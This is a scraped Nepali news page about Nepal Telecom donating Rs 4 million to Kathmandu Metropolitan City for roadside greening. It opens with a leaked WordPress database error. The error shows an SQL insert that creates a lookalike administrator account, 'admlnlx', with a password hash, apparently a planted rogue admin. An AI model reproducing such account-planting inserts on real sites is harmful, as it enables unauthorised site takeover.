WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bk2yf9w.GEFkfFt0U688Sd65/r3DyO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:52:55', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २२ –
नेपाल टेलिकमले काठमाडौंका सडकहरु हरियाली बनाउन काठमाडौं महानगरपालिकालाई ४० लाख रुपैयाँ दिएको छ। उपत्यकाका बिभिन्न सडक छेउछाउमा बोटविरुपवा रोपेर हरियाली बनाउनका लागि टेलिकमले सो रकम दिएको छ। टेलिकमको १३ औं वार्षिक उत्सवको अवसरमा शनिबार आयोजित कार्यक्रममा टेलिकमकी प्रबन्ध निर्देशक कामिनी राजभण्डारीले हरियाली सडक अभियान अन्तर्गत महानगरपालिकालाई रकम दिएको जानकारी दिइन्। सो रकम सूचना तथा सञ्चार मन्त्री सुरेन्द्रकुमार कार्कीले काठमाडौं महानगरपालिकाका कार्यकारी अधिकृत रुद्रसिंह तामाङलाई हस्तान्तरण गरे।